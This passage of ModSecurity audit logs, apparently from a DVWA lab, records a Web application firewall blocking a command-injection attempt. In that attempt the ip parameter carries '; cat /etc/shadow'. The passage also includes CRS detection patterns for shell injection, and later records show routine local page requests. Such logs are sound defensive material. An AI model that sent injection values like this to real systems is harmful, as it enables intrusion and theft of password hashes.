\"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQ2H8AAQEAAAkYuEYAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2650,"p3":0,"p4":0,"p5":359,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A0AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:35:49 GMT","If-None-Match":"\"65-54f67e66856bf\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:57:53 GMT","ETag":"\"15a-54f683559a2e3\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A0AAAAE\"]"],"stopwatch":{"p1":727,"p2":1780,"p3":91,"p4":222,"p5":80,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A4AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A4AAAAE\"]"],"stopwatch":{"p1":612,"p2":1575,"p3":80,"p4":401,"p5":150,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:56 --0400","transaction_id":"WRcQ5H8AAQEAAAkZ0A8AAAAE","remote_address":"127.0.0.1","remote_port":41802,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcQ5H8AAQEAAAkZ0A8AAAAE\"]"],"stopwatch":{"p1":629,"p2":1438,"p3":69,"p4":2691,"p5":150,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4UAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:33:54 GMT","ETag":"\"107-54f68b61bec0e\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZVX8AAQEAAAkVV4UAAAAA\"]"],"stopwatch":{"p1":935,"p2":1365,"p3":65,"p4":148,"p5":56,"sr":50,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4YAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4YAAAAA\"]"],"stopwatch":{"p1":589,"p2":1405,"p3":66,"p4":481,"p5":89,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:33:57 --0400","transaction_id":"WRcZVX8AAQEAAAkVV4cAAAAA","remote_address":"127.0.0.1","remote_port":41974,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4cAAAAA\"]"],"stopwatch":{"p1":470,"p2":863,"p3":46,"p4":245,"p5":160,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
